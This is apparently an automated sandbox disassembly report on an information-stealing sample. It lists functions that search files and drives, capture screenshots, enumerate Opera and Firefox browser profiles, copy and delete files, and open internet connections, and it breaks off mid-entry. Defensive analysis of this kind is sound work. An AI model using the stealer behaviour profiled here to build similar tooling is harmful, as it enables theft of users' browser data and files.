                                                                                    • Opcode ID: d2ccaa95ea3d1ab22d6f6abc5f027eaaadd443aa366ffc733a168da5d7ea793f
                                                                                    • Instruction ID: f1f672f258c776f1ca3ac7439a163f7c96d4881560667c5acbf955a1c295d118
                                                                                    • Opcode Fuzzy Hash: d2ccaa95ea3d1ab22d6f6abc5f027eaaadd443aa366ffc733a168da5d7ea793f
                                                                                    • Instruction Fuzzy Hash: 4BB1B271B093109BDB08EF28C94465ABBF9EB8A718F04C93FE899D7750D73099048B96

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004162B4
                                                                                    • wsprintfA.USER32 ref: 004162D4
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                    • StrCmpCA.SHLWAPI(?,00426908), ref: 00416308
                                                                                    • StrCmpCA.SHLWAPI(?,0042690C), ref: 00416322
                                                                                    • wsprintfA.USER32 ref: 00416346
                                                                                    • StrCmpCA.SHLWAPI(?,0042657D), ref: 00416357
                                                                                    • wsprintfA.USER32 ref: 00416374
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • wsprintfA.USER32 ref: 00416388
                                                                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                    • lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                    • lstrcat.KERNEL32(?,00426924), ref: 004163D9
                                                                                    • lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                    • lstrcat.KERNEL32(?,00426928), ref: 004163FB
                                                                                    • lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                    • FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Filelstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                    • API String ID: 3254224521-445461498
                                                                                    • Opcode ID: c6dd6b3879fbe31c0c2597002abf9d8c351d85b94a33bf6f60126e16f2efa105
                                                                                    • Instruction ID: 716d461ee9032d4a9dae4af77dc79a1df6d5d6082356418533081d48ea1eca12
                                                                                    • Opcode Fuzzy Hash: c6dd6b3879fbe31c0c2597002abf9d8c351d85b94a33bf6f60126e16f2efa105
                                                                                    • Instruction Fuzzy Hash: 34919E71D0025DABDF11EBE4DD4ABDE7BB8AF09304F4040AAF505A3191DB389748CBA5
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00411302
                                                                                    • memset.MSVCRT ref: 00411328
                                                                                    • GetDesktopWindow.USER32 ref: 0041135E
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041136B
                                                                                    • GetDC.USER32(00000000), ref: 00411372
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0041137C
                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041138D
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00411398
                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004113B4
                                                                                    • GlobalFix.KERNEL32(?), ref: 00411412
                                                                                    • GlobalSize.KERNEL32(?), ref: 0041141E
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004043AD: _EH_prolog.MSVCRT ref: 004043B2
                                                                                      • Part of subcall function 004043AD: lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                                      • Part of subcall function 004043AD: StrCmpCA.SHLWAPI(?,004259DF,004259DB,004259D3,004259CF,004259CE), ref: 004044A4
                                                                                      • Part of subcall function 004043AD: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00411498
                                                                                    • DeleteObject.GDI32(?), ref: 004114B3
                                                                                    • DeleteObject.GDI32(00000000), ref: 004114BA
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 004114C4
                                                                                    • CloseWindow.USER32(00000000), ref: 004114CB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                                                    • String ID: image/jpeg
                                                                                    • API String ID: 3067874393-3785015651
                                                                                    • Opcode ID: 70786a0f146ffecec4e1b9b9cc4c00fb730120a767e4e931db604414e9c13406
                                                                                    • Instruction ID: e481ec1d7c30d31008a5a4d171f0d2eaa52fce57a9362255ea0698d6e4794ba3
                                                                                    • Opcode Fuzzy Hash: 70786a0f146ffecec4e1b9b9cc4c00fb730120a767e4e931db604414e9c13406
                                                                                    • Instruction Fuzzy Hash: A05118B2D00218AFDF01AFE5DD499EEBFB9FF09714F10402AFA05E2160D7394A558BA5
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415AC7
                                                                                    • wsprintfA.USER32 ref: 00415AEA
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00415B01
                                                                                    • StrCmpCA.SHLWAPI(?,004268D4), ref: 00415B23
                                                                                    • StrCmpCA.SHLWAPI(?,004268D8), ref: 00415B3D
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415B72
                                                                                    • lstrcat.KERNEL32(?), ref: 00415B85
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415B99
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415BA9
                                                                                    • lstrcat.KERNEL32(?,004268DC), ref: 00415BBB
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415BCF
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00415C69
                                                                                    • FindClose.KERNEL32(00000000), ref: 00415C78
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                    • String ID: %s\%s
                                                                                    • API String ID: 2282932919-4073750446
                                                                                    • Opcode ID: 297e3daf63be3f9388da754876be3650526065ada206baa5a6a1fd9e4802f159
                                                                                    • Instruction ID: 94379aee551275b5d998bba74236b2289a82a8dc712773d574ff1e2d259f5726
                                                                                    • Opcode Fuzzy Hash: 297e3daf63be3f9388da754876be3650526065ada206baa5a6a1fd9e4802f159
                                                                                    • Instruction Fuzzy Hash: 9E511D72900229ABDF11EBA1DD49EDE7B7CAF49304F0404AAE605E2151E7389789CBA5
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00409F77
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425C06,00000000,-00000020,00000000), ref: 00409FF6
                                                                                    • StrCmpCA.SHLWAPI(?,00425E68), ref: 0040A050
                                                                                    • StrCmpCA.SHLWAPI(?,00425E6C), ref: 0040A06A
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera,00425C13,00425C12,00425C0F,00425C0E,00425C0B,00425C0A,00425C07), ref: 0040A0FD
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A111
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A125
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                    • String ID: 7$Opera$Opera Crypto$Opera GX$\*.*
                                                                                    • API String ID: 3869166975-536343317
                                                                                    • Opcode ID: 6700c66a51acd6c16a295116433c442144113a80d9080ee2fe10d6ef4b4d74b1
                                                                                    • Instruction ID: a17e2f684122670e3be7096712bbacc747ed706b0b8df0d6fbcd956b9d9e9cda
                                                                                    • Opcode Fuzzy Hash: 6700c66a51acd6c16a295116433c442144113a80d9080ee2fe10d6ef4b4d74b1
                                                                                    • Instruction Fuzzy Hash: 2C425B70904288EADF15EBE5C955BDDBBB46F29308F5040BEA409736C2DB781B4CCB66
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415848
                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
                                                                                    • memset.MSVCRT ref: 004158C9
                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 004158D2
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 004158F2
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00415910
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 004153F6: _EH_prolog.MSVCRT ref: 004153FB
                                                                                      • Part of subcall function 004153F6: wsprintfA.USER32 ref: 00415421
                                                                                      • Part of subcall function 004153F6: FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                                      • Part of subcall function 004153F6: memset.MSVCRT ref: 0041544F
                                                                                      • Part of subcall function 004153F6: memset.MSVCRT ref: 0041545D
                                                                                      • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,0042684C), ref: 0041547B
                                                                                      • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,00426850), ref: 00415495
                                                                                      • Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154B9
                                                                                      • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,0042656E), ref: 004154CA
                                                                                      • Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154F0
                                                                                      • Part of subcall function 004153F6: memset.MSVCRT ref: 00415516
                                                                                      • Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 00415528
                                                                                      • Part of subcall function 004153F6: strtok_s.MSVCRT ref: 00415561
                                                                                      • Part of subcall function 004153F6: memset.MSVCRT ref: 00415576
                                                                                      • Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00415933
                                                                                    • lstrlenA.KERNEL32(?), ref: 00415998
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
                                                                                    • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                    • API String ID: 2879972474-147700698
                                                                                    • Opcode ID: 4245d552df83b068be1558a689d43aef9dea607818b0117f9054742c8dc341e5
                                                                                    • Instruction ID: 8fb32ebea5ed90456f7ca7ea911cfe9f81c0b13f291b8680dac0f4474b3225bb
                                                                                    • Opcode Fuzzy Hash: 4245d552df83b068be1558a689d43aef9dea607818b0117f9054742c8dc341e5
                                                                                    • Instruction Fuzzy Hash: 395152B190025CEADF30AF61DC55EEE7B7DAF05344F50003ABA15A2191DB386A49CB59
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00401167
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                    • StrCmpCA.SHLWAPI(?,00422378), ref: 004013CA
                                                                                    • StrCmpCA.SHLWAPI(?,0042237C), ref: 004013E4
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00422388,?,?,?,00422384,?,?,?,00422380,?,?), ref: 00401510
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                    • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,0042238C), ref: 00401832
                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,0042238C), ref: 00401841
                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00401BD4
                                                                                    • FindClose.KERNEL32(?), ref: 00401BE5
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 0040618B: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                      • Part of subcall function 00414437: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: FileH_prolog$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                    • String ID: 7$\*.*
                                                                                    • API String ID: 40499504-4165053604
                                                                                    • Opcode ID: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                                    • Instruction ID: 8097af2253b6e43ffd1ff437b79a581fef85e219c3474a36129b1183f2ad689d
                                                                                    • Opcode Fuzzy Hash: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                                    • Instruction Fuzzy Hash: 04624D70904188EADB15EBE5C955BDDBBB8AF29308F5040BEA509735C2DF781B4CCB25
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040B468
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F68,?,?,00425C47,?,00000000,?), ref: 0040B4E7
                                                                                    • StrCmpCA.SHLWAPI(?,00425F6C,?,00000000,?), ref: 0040B50B
                                                                                    • StrCmpCA.SHLWAPI(?,00425F70,?,00000000,?), ref: 0040B525
                                                                                    • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F74,?,?,00425C4A,?,00000000,?), ref: 0040B5C1
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425F84,?,?,00000000,00425C4B,?,00000000,?), ref: 0040B6C6
                                                                                    • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040B79B
                                                                                    • FindNextFileA.KERNELBASE(?,?,?,00000000,?), ref: 0040B84A
                                                                                    • FindClose.KERNEL32(?,?,00000000,?), ref: 0040B85B
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: FileH_prologlstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                    • String ID: prefs.js
                                                                                    • API String ID: 2318033617-3783873740
                                                                                    • Opcode ID: 5666919e8824e042d0b5f70852cf441639314b1659d2301ad99abcf42152bb5b
                                                                                    • Instruction ID: be7758ef0e9bd93280a5f92db672ae0ad47210b716bb060d05ded798a66e6481
                                                                                    • Opcode Fuzzy Hash: 5666919e8824e042d0b5f70852cf441639314b1659d2301ad99abcf42152bb5b
                                                                                    • Instruction Fuzzy Hash: C9D18471900248EADB14EBE5C956BDDBBB4AF19304F5040BEE409B36C2DB781B4CCB66
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004094EA
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425E1C,?,?,00425BFA,?), ref: 00409567
                                                                                    • StrCmpCA.SHLWAPI(?,00425E20), ref: 00409584
                                                                                    • StrCmpCA.SHLWAPI(?,00425E24), ref: 0040959E
                                                                                    • StrCmpCA.SHLWAPI(?,00000000,?,?,?,00425E28,?,?,00425BFB), ref: 00409635
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 004096B6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00408759: _EH_prolog.MSVCRT ref: 0040875E
                                                                                      • Part of subcall function 00408759: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425DC8,?,?,?,00425BEA,00000000), ref: 00408841
                                                                                    • FindNextFileA.KERNELBASE(00000000,?), ref: 0040989F
                                                                                    • FindClose.KERNEL32(00000000), ref: 004098AE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 322284088-0
                                                                                    • Opcode ID: e559499c3d2ef85a473f19cc83e64b7af054a451df30679cf9fec3c86fffa07d
                                                                                    • Instruction ID: f469bbe6791ff6929fd52be51ed7484ae91504fa3db0a5c2044313ffea23fdba
                                                                                    • Opcode Fuzzy Hash: e559499c3d2ef85a473f19cc83e64b7af054a451df30679cf9fec3c86fffa07d
                                                                                    • Instruction Fuzzy Hash: 73C17270900249EADF10EBA5D9167DDBFB8AB09304F10417EE844B36C2DB785B08CBA6
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040FCEA
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,004262AF,00000001,?,00000000), ref: 0040FD1C
                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
                                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
                                                                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • LocalFree.KERNEL32(?), ref: 0040FE03
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                    • String ID: /
                                                                                    • API String ID: 2868853201-4001269591
                                                                                    • Opcode ID: 8e81c3fcb6512392ecb3f0709d7808244dc03f0de8ce522feb2af1cedb86ee9d
                                                                                    • Instruction ID: 670fa807c41248f436aa2cd72aaefdfaece762a4e3a61ecb974f96717b874319
                                                                                    • Opcode Fuzzy Hash: 8e81c3fcb6512392ecb3f0709d7808244dc03f0de8ce522feb2af1cedb86ee9d
                                                                                    • Instruction Fuzzy Hash: D231EDB1901119EFDB10EFE5D885AEEBBB9EF48304F54407EE509B3681C7785A88CB64
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004106C9
                                                                                    • CoCreateInstance.OLE32(00426D5C,00000000,00000001,00426488,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
                                                                                    • SysAllocString.OLEAUT32(?), ref: 004106FD
                                                                                    • _wtoi64.MSVCRT ref: 00410738
                                                                                    • SysFreeString.OLEAUT32(?), ref: 0041074B
                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00410752
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: String$Free$AllocCreateH_prologInstance_wtoi64
                                                                                    • String ID:
                                                                                    • API String ID: 1816492551-0
                                                                                    • Opcode ID: 5a519e56b5a3f35fac8b8731372418453ffdd9c68a54ed5590e156cd5d61d494
                                                                                    • Instruction ID: 38727b362cf05651e2ba0c167973076b7eb5e8e7f8c877263c03ca4ede2a4bf2
                                                                                    • Opcode Fuzzy Hash: 5a519e56b5a3f35fac8b8731372418453ffdd9c68a54ed5590e156cd5d61d494
                                                                                    • Instruction Fuzzy Hash: A921A571A00109AFCB00DFA4DD889EE7BB5FF88304B60846EF515E7250C7B59D85CB64
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004111C3
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111E9
                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 004111F9
